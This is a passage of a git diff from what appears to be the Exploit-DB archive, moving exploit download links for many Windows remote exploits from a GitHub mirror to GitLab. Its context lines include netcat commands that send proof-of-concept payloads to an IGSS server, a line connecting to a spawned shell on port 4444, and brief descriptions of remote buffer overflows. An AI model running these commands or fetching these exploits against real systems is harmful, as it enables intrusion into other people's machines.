http://aluigi.org/poc/igss_3.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-3.zip (igss_3.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-3.zip (igss_3.zip) nc SERVER 12401 < igss_3.dat @@ -215,7 +215,7 @@ The Code =========== http://aluigi.org/poc/igss_4.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-4.zip (igss_4.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-4.zip (igss_4.zip) Proof-of-concept via "ReadFile": nc SERVER 12401 < igss_4a.dat @@ -265,7 +265,7 @@ The following proof-of-concept exploits the vulnerability from the other vulnerabilities before the reaching of this bugged function: http://aluigi.org/poc/igss_5.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-5.zip (igss_5.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-5.zip (igss_5.zip) nc SERVER 12401 < igss_5a.dat (will add the "old_name" template) nc SERVER 12401 < igss_5b.dat @@ -312,7 +312,7 @@ The Code =========== http://aluigi.org/poc/igss_6.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-6.zip (igss_6.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-6.zip (igss_6.zip) nc SERVER 12401 < igss_6.dat @@ -351,7 +351,7 @@ The Code =========== http://aluigi.org/poc/igss_7.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-7.zip (igss_7.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-7.zip (igss_7.zip) nc SERVER 12401 < igss_7.dat @@ -379,7 +379,7 @@ The Code http://aluigi.org/poc/igss_8.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-8.zip (igss_8.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-8.zip (igss_8.zip) Two examples for executing calc.exe ("calc.exe arg1 arg2 arg3"): nc SERVER 12397 < igss_8a.dat diff --git a/exploits/windows/remote/17104.txt b/exploits/windows/remote/17104.txt index 2acc8290a..fc2f72f67 100644 --- a/exploits/windows/remote/17104.txt +++ b/exploits/windows/remote/17104.txt @@ -349,4 +349,4 @@ binary info: POC: pocs availiable here: http://retrogod.altervista.org/9sg_realgames_i.html - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17104.zip (9sg_StubbyUtil.ShellCtl.1.zip) \ No newline at end of file + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17104.zip (9sg_StubbyUtil.ShellCtl.1.zip) \ No newline at end of file diff --git a/exploits/windows/remote/17105.txt b/exploits/windows/remote/17105.txt index e56baa153..1d9e2fc76 100644 --- a/exploits/windows/remote/17105.txt +++ b/exploits/windows/remote/17105.txt @@ -226,4 +226,4 @@ binary info: poc: pocs availiable here: http://retrogod.altervista.org/9sg_realgames_ii.html - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17105.zip (9sg_StubbyUtil.ProcessMgr.1.zip) \ No newline at end of file + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17105.zip (9sg_StubbyUtil.ProcessMgr.1.zip) \ No newline at end of file diff --git a/exploits/windows/remote/17187.txt b/exploits/windows/remote/17187.txt index 26ba61bef..c6bdc9219 100644 --- a/exploits/windows/remote/17187.txt +++ b/exploits/windows/remote/17187.txt @@ -19,4 +19,4 @@ Note: In using strings as a buffer for shellcode in action script, it is importa Here you can get our reliable exploit against windows 7 : calc.exe payload -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17187.zip (CVE-2010-3654_Win7.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17187.zip (CVE-2010-3654_Win7.zip) \ No newline at end of file diff --git a/exploits/windows/remote/17419.zip b/exploits/windows/remote/17419.zip index 2d5220dfc..d8f20ab75 100644 --- a/exploits/windows/remote/17419.zip +++ b/exploits/windows/remote/17419.zip @@ -17,8 +17,8 @@ reliably on Windows7. there is two version of this exploit XP and 7 and both use different method that used in MSF Exploit bounty ! -XP Version: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17419-1.zip (nsTreeRange_XP.zip) -Win7 Version: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17419-2.zip (nsTreeRange_7.zip) +XP Version: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17419-1.zip (nsTreeRange_XP.zip) +Win7 Version: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17419-2.zip (nsTreeRange_7.zip) diff --git a/exploits/windows/remote/17517.txt b/exploits/windows/remote/17517.txt index 3a0bc424d..7e4939ef2 100644 --- a/exploits/windows/remote/17517.txt +++ b/exploits/windows/remote/17517.txt @@ -13,4 +13,4 @@ Symantec Disclosure link: http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110526_00 iViZ Disclosure link: goo.gl/1vzdE -Exploit Code: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17517.zip (SymantecReplay.zip) \ No newline at end of file +Exploit Code: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17517.zip (SymantecReplay.zip) \ No newline at end of file diff --git a/exploits/windows/remote/17550.py b/exploits/windows/remote/17550.py index 411bbabb9..8b79d4601 100755 --- a/exploits/windows/remote/17550.py +++ b/exploits/windows/remote/17550.py @@ -64,4 +64,4 @@ if __name__ == '__main__': host = sys.argv[1] port = sys.argv[2] sploit(host, int(port)) - os.system("nc " + host + " 4444") + os.system("nc " + host + " 4444") \ No newline at end of file diff --git a/exploits/windows/remote/17575.txt b/exploits/windows/remote/17575.txt index 8e664fd06..bb199a41b 100644 --- a/exploits/windows/remote/17575.txt +++ b/exploits/windows/remote/17575.txt @@ -23,4 +23,4 @@ CVEs listed in APPLE-SA-2011-07-20-1. and follow @abysssec for updates http://www.abysssec.com/files/CVE-2011-0222_WinXP_Exploit.zip - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17575.zip (CVE-2011-0222_WinXP_Exploit.zip) \ No newline at end of file + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17575.zip (CVE-2011-0222_WinXP_Exploit.zip) \ No newline at end of file diff --git a/exploits/windows/remote/17974.html b/exploits/windows/remote/17974.html index 1dc65c035..2b5fed6b0 100644 --- a/exploits/windows/remote/17974.html +++ b/exploits/windows/remote/17974.html @@ -2,7 +2,7 @@ # Date: 12 Oct 2011 # Author: Matteo Memelli ryujin -AT- offensive-security.com # CVE-2011-2371 -# Full exploit package: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17974.zip +# Full exploit package: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17974.zip <html> <head> @@ -16,7 +16,7 @@ Date: 12 Oct 2011<br /> Author: Matteo Memelli ryujin -AT- offensive-security.com<br /> CVE-2011-2371<br /> Full exploit package: <br /> -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17974.zip <br /> +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17974.zip <br /> <br /> Thx to dookie for helping ;)<br/> Vulnerability discovered by Chris Rohlf and Yan Ivnitskiy of Matasano Security<br /> diff --git a/exploits/windows/remote/17977.txt b/exploits/windows/remote/17977.txt index 5a63287cc..1d64c32ef 100644 --- a/exploits/windows/remote/17977.txt +++ b/exploits/windows/remote/17977.txt @@ -24,4 +24,4 @@ FILES: CHEERS, KINGCOPE -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17977.tar.bz2 (DAYTONA_FULL.tar.bz2) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17977.tar.bz2 (DAYTONA_FULL.tar.bz2) \ No newline at end of file diff --git a/exploits/windows/remote/18016.txt b/exploits/windows/remote/18016.txt index aa7af653e..2e4dbf749 100644 --- a/exploits/windows/remote/18016.txt +++ b/exploits/windows/remote/18016.txt @@ -59,4 +59,4 @@ The resulting file will look like this: poc, which overwrites boot.ini: http://retrogod.altervista.org/9sg_autovueiii.zip -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18016.zip (9sg_autovueiii.zip) \ No newline at end of file +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18016.zip (9sg_autovueiii.zip) \ No newline at end of file diff --git a/exploits/windows/remote/18437.txt b/exploits/windows/remote/18437.txt index 8c2d17403..86242ddf7 100644 --- a/exploits/windows/remote/18437.txt +++ b/exploits/windows/remote/18437.txt @@ -5,7 +5,7 @@ # contact : info [at] abysssec.com # http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability # -# Full PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18437.zip (CVE-2011-2140.zip) +# Full PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18437.zip (CVE-2011-2140.zip) # import sys diff --git a/exploits/windows/remote/18531.html b/exploits/windows/remote/18531.html index 0ccd6e3fa..1689db02a 100644 --- a/exploits/windows/remote/18531.html +++ b/exploits/windows/remote/18531.html @@ -1,6 +1,6 @@ <!-- -Full Exploit Code: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18531.zip +Full Exploit Code: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18531.zip PoC exploit for CVE-2011-2371 diff --git a/exploits/windows/remote/190.c b/exploits/windows/remote/190.c index 8e34663f1..19fdcade2 100644 --- a/exploits/windows/remote/190.c +++ b/exploits/windows/remote/190.c @@ -173,10 +173,10 @@ int main(int argc, char **argv) return 0; } -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/190-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/190-2.obsd +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-2.obsd -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/190-3.linux +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-3.linux // milw0rm.com [2000-11-18] \ No newline at end of file diff --git a/exploits/windows/remote/19094.txt b/exploits/windows/remote/19094.txt index aaadc5cf5..ad1bc279c 100644 --- a/exploits/windows/remote/19094.txt +++ b/exploits/windows/remote/19094.txt @@ -10,4 +10,4 @@ Another vulnerability in this controls also allows local files to be stolen by u Another vulnerability in this control allows an HTML document to acess the contents (read and write) of other framers regardless of their domain of origin against the cross-frame security rules. It also allows the page to perform spoofed transactions allowing it to submit forms without user intervention. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19094.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19094.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/19245.pl b/exploits/windows/remote/19245.pl index 808be3623..171b9f4d3 100755 --- a/exploits/windows/remote/19245.pl +++ b/exploits/windows/remote/19245.pl @@ -14,4 +14,4 @@ warn "$i\n"; get "http://$ARGV[0]/".('a' x $i).".htr"; } -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19245.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19245.exe \ No newline at end of file diff --git a/exploits/windows/remote/19435.html b/exploits/windows/remote/19435.html index 01f1e68d3..3d37efb0f 100644 --- a/exploits/windows/remote/19435.html +++ b/exploits/windows/remote/19435.html @@ -78,4 +78,4 @@ this here thingy to test==></FONT></FONT></FONT> window.open('/toto?s=76000007', '_geo_toto', 'width=515,height=125'); // --> </SCRIPT> -<!-- </SERVICE> --> +<!-- </SERVICE> --> \ No newline at end of file diff --git a/exploits/windows/remote/19570.txt b/exploits/windows/remote/19570.txt index 21e4dddef..d7466f82f 100644 --- a/exploits/windows/remote/19570.txt +++ b/exploits/windows/remote/19570.txt @@ -5,4 +5,4 @@ WFTPD is reported prone to a remote buffer overflow vulnerability. The issue exi This vulnerability may be exploited by a remote authenticate attacker to execute arbitrary code in the context of the affected service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19570.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19570.tgz \ No newline at end of file diff --git a/exploits/windows/remote/19580.txt b/exploits/windows/remote/19580.txt index d3a5a8f11..29eb4c37f 100644 --- a/exploits/windows/remote/19580.txt +++ b/exploits/windows/remote/19580.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/755/info The Avirt Mail Server 3.3a and 3.5 packages are vulnerable to a remote buffer overflow vulnerability. The buffer overflow can be initiated by passing 856 characters in the password field. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19580.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19580.zip \ No newline at end of file diff --git a/exploits/windows/remote/19581.txt b/exploits/windows/remote/19581.txt index 6f4b748be..3754aa7b8 100644 --- a/exploits/windows/remote/19581.txt +++ b/exploits/windows/remote/19581.txt @@ -482,4 +482,4 @@ endp end start -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19581.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19581.exe \ No newline at end of file diff --git a/exploits/windows/remote/19611.txt b/exploits/windows/remote/19611.txt index 228f338f2..bb734ef3d 100644 --- a/exploits/windows/remote/19611.txt +++ b/exploits/windows/remote/19611.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/783/info If an unusually long user name is passed to the Broker FTP server software, the program will crash. If the program is running as a service, the service will consume all available memory and crash the entire system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19611.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19611.zip \ No newline at end of file diff --git a/exploits/windows/remote/19614.asm b/exploits/windows/remote/19614.asm index 90234af25..a822e2c5e 100644 --- a/exploits/windows/remote/19614.asm +++ b/exploits/windows/remote/19614.asm @@ -606,4 +606,4 @@ endp end start -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19614.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19614.exe \ No newline at end of file diff --git a/exploits/windows/remote/19617.txt b/exploits/windows/remote/19617.txt index 3e01d141d..59cc76dd7 100644 --- a/exploits/windows/remote/19617.txt +++ b/exploits/windows/remote/19617.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/790/info The POP server that is part of the NetcPlus SmartServer3 email server has an unchecked buffer that could allow an attacker to execute code on the server. If the USER command is followed by an argument of over 800 characters, the input buffer will be overflowed, and data from the argument will be passed to the system to be executed at the privelege level of the SmartServer program. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19617.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19617.zip \ No newline at end of file diff --git a/exploits/windows/remote/19679.txt b/exploits/windows/remote/19679.txt index 02a730cab..f9f749af1 100644 --- a/exploits/windows/remote/19679.txt +++ b/exploits/windows/remote/19679.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/874/info Infoseek's Ultraseek enterprise search server listens on port 8765 by default for HTTP commands. The code that handles GET commands has an unchecked buffer that will allow arbitrary code to be executed if it is overflowed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19679-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19679-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19679-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19679-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/19688.txt b/exploits/windows/remote/19688.txt index 03bf0731b..faf12b857 100644 --- a/exploits/windows/remote/19688.txt +++ b/exploits/windows/remote/19688.txt @@ -8,6 +8,6 @@ USSR exploit: Binary exploit - 19688.exe Source code - 19688.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19688.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19688.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19688.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19688.zip \ No newline at end of file diff --git a/exploits/windows/remote/19743.txt b/exploits/windows/remote/19743.txt index 62e898e30..2b3a8184c 100644 --- a/exploits/windows/remote/19743.txt +++ b/exploits/windows/remote/19743.txt @@ -15,8 +15,8 @@ Source code for above exploit link.bro: Example of a malformed shortcut file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19743-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19743-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19743-2.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19743-2.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19743-3.bro \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19743-3.bro \ No newline at end of file diff --git a/exploits/windows/remote/19895.txt b/exploits/windows/remote/19895.txt index c87f44fee..53417b402 100644 --- a/exploits/windows/remote/19895.txt +++ b/exploits/windows/remote/19895.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1172/info DNews News Server is a CGI application that gives access to auser's NNTP server over the web. There are many unchecked buffers in the program, some of which can be exploited directly from any browser. Supplying an overlylong value for the "group", "cmd" and "utag" variables, and possibly others, will overwrite their respective buffers. In this manner, arbitrary code can be executed on the remote target. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19895.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19895.zip \ No newline at end of file diff --git a/exploits/windows/remote/20079.txt b/exploits/windows/remote/20079.txt index 13dd98dc9..775a164f6 100644 --- a/exploits/windows/remote/20079.txt +++ b/exploits/windows/remote/20079.txt @@ -17,6 +17,6 @@ A user would only have to download an offending email in order to become suscept Windows Console Version - 20079-2.exe Windows Console Version Source - 20079-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20079-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20079-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20079-2.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20079-2.exe \ No newline at end of file diff --git a/exploits/windows/remote/20106.cpp b/exploits/windows/remote/20106.cpp index b9ecb97d0..1d73b1ee4 100644 --- a/exploits/windows/remote/20106.cpp +++ b/exploits/windows/remote/20106.cpp @@ -3733,4 +3733,4 @@ int main(int argc, char* argv[]) } -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20106.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20106.exe \ No newline at end of file diff --git a/exploits/windows/remote/20184.txt b/exploits/windows/remote/20184.txt index 7780274f9..081e69d54 100644 --- a/exploits/windows/remote/20184.txt +++ b/exploits/windows/remote/20184.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1627/info IRIS from eEye Digital Security is a protocol analyzer geared towards network management, it is currently in BETA. This product was formerly known as SpyNet CaptureNet. Certain versions of the this software are vulnerable to a remotely triggered buffer overflow attack. This attack is orchestrated by a malicious user launching multiple UDP sessions to random ports on the machine which IRIS resides on (and is in operation on). The net result of this buffer overflow is that the product ceases to function and may drive system resources to 100% before exiting. It may be possible that this overflow (a heap overflow according to the attached advisory) could result in a system compromise. No information indicating that this is the case has been released. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20184.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20184.zip \ No newline at end of file diff --git a/exploits/windows/remote/20240.txt b/exploits/windows/remote/20240.txt index 81005a400..91dd6350a 100644 --- a/exploits/windows/remote/20240.txt +++ b/exploits/windows/remote/20240.txt @@ -7,6 +7,6 @@ If a user of Outlook or Outlook Express were to receive an RTF email containing Binary - 20240-1.exe Source - 20240-2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20240-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20240-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20240-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20240-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/20283.txt b/exploits/windows/remote/20283.txt index e85e87df1..bdea4a3df 100644 --- a/exploits/windows/remote/20283.txt +++ b/exploits/windows/remote/20283.txt @@ -12,4 +12,4 @@ Windows 9x remote administration is also affected by this vulnerability because Successful exploitation of this vulnerability could lead to the retrieval, modification, addition, and deletion of files residing on a file or print share. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20283.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20283.zip \ No newline at end of file diff --git a/exploits/windows/remote/20284.txt b/exploits/windows/remote/20284.txt index 72ae339d3..567f55321 100644 --- a/exploits/windows/remote/20284.txt +++ b/exploits/windows/remote/20284.txt @@ -13,4 +13,4 @@ Windows 9x remote administration is also affected by this vulnerability because Successful exploitation of this vulnerability could lead to the retrieval, modification, addition, and deletion of files residing on a file or print share. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20284.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20284.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/20334.java b/exploits/windows/remote/20334.java index 30ed4515c..1ecedde2a 100644 --- a/exploits/windows/remote/20334.java +++ b/exploits/windows/remote/20334.java @@ -195,4 +195,4 @@ public class newftpbrute -}//class +}//class \ No newline at end of file diff --git a/exploits/windows/remote/20427.txt b/exploits/windows/remote/20427.txt index 5d1352bcb..b4ea650b1 100644 --- a/exploits/windows/remote/20427.txt +++ b/exploits/windows/remote/20427.txt @@ -8,4 +8,4 @@ Depending on the data that is copied, a denial of service attack could be launch If a user was misled to download a hostile .ASX file to the local machine, they would only have to single click on the file within Windows Explorer to activate the code. This is due to the 'Web View' option that is used by Windows Explorer to preview web documents automatically while browsing (this feature is enabled by default). In addition, a malformed .ASX file could be embedded into a HTML document and be configured to execute when opened via a browser or HTML compliant email client. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20427.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20427.zip \ No newline at end of file diff --git a/exploits/windows/remote/2054.txt b/exploits/windows/remote/2054.txt index 220c2aa06..e454a605a 100644 --- a/exploits/windows/remote/2054.txt +++ b/exploits/windows/remote/2054.txt @@ -1,5 +1,5 @@ MS Windows DHCP Client Broadcast Attack Exploit (MS06-036) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2054.tar.gz (07212006-MS06_036_DHCP_Client.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2054.tar.gz (07212006-MS06_036_DHCP_Client.tar.gz) # milw0rm.com [2006-07-21] \ No newline at end of file diff --git a/exploits/windows/remote/20547.txt b/exploits/windows/remote/20547.txt index 4200027a3..6901a1ac2 100644 --- a/exploits/windows/remote/20547.txt +++ b/exploits/windows/remote/20547.txt @@ -20,5 +20,4 @@ was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability." -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20547.rar - +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20547.rar \ No newline at end of file diff --git a/exploits/windows/remote/20571.txt b/exploits/windows/remote/20571.txt index a0daf16d6..75a4646d5 100644 --- a/exploits/windows/remote/20571.txt +++ b/exploits/windows/remote/20571.txt @@ -4,4 +4,4 @@ Versions of MS Outlook are vulnerable to receiving a hidden, potentially hostile This can also be used to circumvent Outlook's dangerous file security feature. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20571.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20571.zip \ No newline at end of file diff --git a/exploits/windows/remote/20758.c b/exploits/windows/remote/20758.c index d096d7fd8..7fc3982e0 100644 --- a/exploits/windows/remote/20758.c +++ b/exploits/windows/remote/20758.c @@ -8,7 +8,7 @@ Version: 0.3z R2 Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003, Windows Server 2008, it should work on all Windows. -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20758.tar.gz +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20758.tar.gz */ #include "main.h" diff --git a/exploits/windows/remote/20774.txt b/exploits/windows/remote/20774.txt index ef7fdb629..6e8681f92 100644 --- a/exploits/windows/remote/20774.txt +++ b/exploits/windows/remote/20774.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/2612/info The default operation performed to open a filetype is determining by referencing the filetype's CLSID. Due to a flaw in the interpretation of CLSIDs when appended to a filename, it is possible to specify a different default action for a given file than would normally be used. As a result, seemingly harmless files (.txt, .jpg etc) may be opened in a nonstandard, attacker specified manner. For example, a program ("evil.exe") could be renamed "evil.jpg.{CLSID_of_executables}" and when opened by the target user, this file will be executed instead of opened by their default .jpg viewer. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20774.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20774.zip \ No newline at end of file diff --git a/exploits/windows/remote/20775.txt b/exploits/windows/remote/20775.txt index 5604c94d8..c72d7630d 100644 --- a/exploits/windows/remote/20775.txt +++ b/exploits/windows/remote/20775.txt @@ -6,4 +6,4 @@ This overflow, if successfully exploited, allows execution of arbitrary code by Hosts with SmartDownload installed are vulnerable regardless of whether SmartDownload is enabled. Exploit code is available for this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20775.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20775.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/20818.txt b/exploits/windows/remote/20818.txt index 18a6912e7..1caf5e50b 100644 --- a/exploits/windows/remote/20818.txt +++ b/exploits/windows/remote/20818.txt @@ -4,4 +4,4 @@ Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handle * If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20818.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20818.zip \ No newline at end of file diff --git a/exploits/windows/remote/20820.c b/exploits/windows/remote/20820.c index 1768c7d28..08de716e8 100644 --- a/exploits/windows/remote/20820.c +++ b/exploits/windows/remote/20820.c @@ -118,6 +118,6 @@ int main () } -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20820-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20820-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20820-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20820-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/20840.txt b/exploits/windows/remote/20840.txt index 741a7f614..fce7f84ff 100644 --- a/exploits/windows/remote/20840.txt +++ b/exploits/windows/remote/20840.txt @@ -16,4 +16,4 @@ Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20840.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20840.tgz \ No newline at end of file diff --git a/exploits/windows/remote/20841.txt b/exploits/windows/remote/20841.txt index 598b8eaf0..13bf41d4b 100644 --- a/exploits/windows/remote/20841.txt +++ b/exploits/windows/remote/20841.txt 